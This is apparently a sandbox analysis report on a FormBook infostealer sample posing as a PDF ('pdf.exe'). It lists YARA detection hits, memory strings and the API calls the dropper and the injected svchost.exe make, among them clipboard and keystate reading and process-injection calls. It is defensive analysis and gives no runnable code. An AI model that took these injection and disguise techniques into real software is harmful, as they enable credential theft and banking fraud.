                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D36D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00D36D07
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00396B0C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00382B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00382B37
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003AF7FF
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D4F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00D4F7FF

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00343D19
                    Source: 5674656777985-069688574654 pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6022484a-7
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 7SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f88ba2cd-d
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000003.1835246280.000000000367D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a862dfd8-4
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000003.1835246280.000000000367D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8095573e-2
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: This is a third-party compiled AutoIt script.1_2_00CE3D19
                    Source: cunila.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: cunila.exe, 00000001.00000002.1860102558.0000000000D8E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9fe21cb6-7
                    Source: cunila.exe, 00000001.00000002.1860102558.0000000000D8E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_25ac0c83-9
                    Source: cunila.exe, 00000004.00000000.1963487609.0000000000D8E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ca6c87a2-1
                    Source: cunila.exe, 00000004.00000000.1963487609.0000000000D8E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0156bbd1-e
                    Source: 5674656777985-069688574654 pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f98989e4-e
                    Source: 5674656777985-069688574654 pdf.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2e3a6f9d-9
                    Source: cunila.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6dbe4407-5
                    Source: cunila.exe.0.drString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8c4a63cb-0
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CD93 NtClose,2_2_0042CD93
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,2_2_032735C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,2_2_03272BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,2_2_03272AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,2_2_03272F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,2_2_03272F90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,2_2_03272FE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,2_2_03272EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,2_2_03272E80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,2_2_03272D30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,2_2_03272DD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,2_2_03272CA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00386606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00386606
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0037ACC5
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003879D3
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00D279D3
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0034E3E30_2_0034E3E3
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036B0430_2_0036B043
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003532000_2_00353200
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037410F0_2_0037410F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003602A40_2_003602A4
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037038E0_2_0037038E
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037467F0_2_0037467F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003606D90_2_003606D9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003AAACE0_2_003AAACE
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00374BEF0_2_00374BEF
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036CCC10_2_0036CCC1
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00346F070_2_00346F07
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0034AF500_2_0034AF50
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035B11F0_2_0035B11F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003A31BC0_2_003A31BC
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036D1B90_2_0036D1B9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036123A0_2_0036123A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037724D0_2_0037724D
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003493F00_2_003493F0
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003813CA0_2_003813CA
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035F5630_2_0035F563
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003496C00_2_003496C0
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038B6CC0_2_0038B6CC
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003477B00_2_003477B0
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003AF7FF0_2_003AF7FF
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003779C90_2_003779C9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035FA570_2_0035FA57
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00353B700_2_00353B70
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00349B600_2_00349B60
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00347D190_2_00347D19
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035FE6F0_2_0035FE6F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00369ED00_2_00369ED0
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00347FA30_2_00347FA3
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00CEE7980_2_00CEE798
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0B0431_2_00D0B043
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CF32001_2_00CF3200
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CF3B701_2_00CF3B70
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D1410F1_2_00D1410F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D002A41_2_00D002A4
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D1038E1_2_00D1038E
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CEE3B01_2_00CEE3B0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D006D91_2_00D006D9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D1467F1_2_00D1467F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D4AACE1_2_00D4AACE
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D14BEF1_2_00D14BEF
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0CCC11_2_00D0CCC1
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CEAF501_2_00CEAF50
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CE6F071_2_00CE6F07
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D431BC1_2_00D431BC
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0D1B91_2_00D0D1B9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CFB11F1_2_00CFB11F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D1724D1_2_00D1724D
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0123A1_2_00D0123A
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D213CA1_2_00D213CA
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CE93F01_2_00CE93F0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CFF5631_2_00CFF563
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CE96C01_2_00CE96C0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2B6CC1_2_00D2B6CC
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D4F7FF1_2_00D4F7FF
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CE77B01_2_00CE77B0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D179C91_2_00D179C9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CFFA571_2_00CFFA57
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CE9B601_2_00CE9B60
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CE7D191_2_00CE7D19
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D09ED01_2_00D09ED0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CFFE6F1_2_00CFFE6F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CE7FA31_2_00CE7FA3
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_0147F3B01_2_0147F3B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C532_2_00418C53
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030602_2_00403060
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011302_2_00401130
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E93C2_2_0040E93C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040236B2_2_0040236B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023702_2_00402370
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F3932_2_0042F393
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104C32_2_004104C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104BA2_2_004104BA
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416DFD2_2_00416DFD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416E432_2_00416E43
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004106E32_2_004106E3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027602_2_00402760
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E7632_2_0040E763
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA3522_2_032FA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F02_2_0324E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033003E62_2_033003E6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E02742_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C02C02_2_032C02C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032301002_2_03230100
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA1182_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C81582_2_032C8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F41A22_2_032F41A2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033001AA2_2_033001AA
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81CC2_2_032F81CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D20002_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032407702_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032647502_2_03264750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C02_2_0323C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6E02_2_0325C6E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032405352_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033005912_2_03300591
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E44202_2_032E4420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F24462_2_032F2446
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE4F62_2_032EE4F6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB402_2_032FAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6BD72_2_032F6BD7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA802_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032569622_2_03256962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A02_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A9A62_2_0330A9A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A8402_2_0324A840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428402_2_03242840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268B82_2_032268B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8F02_2_0326E8F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282F282_2_03282F28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260F302_2_03260F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E2F302_2_032E2F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4F402_2_032B4F40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEFA02_2_032BEFA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232FC82_2_03232FC8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEE262_2_032FEE26
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240E592_2_03240E59
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252E902_2_03252E90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCE932_2_032FCE93
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEEDB2_2_032FEEDB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AD002_2_0324AD00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DCD1F2_2_032DCD1F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258DBF2_2_03258DBF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323ADE02_2_0323ADE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240C002_2_03240C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0CB52_2_032E0CB5
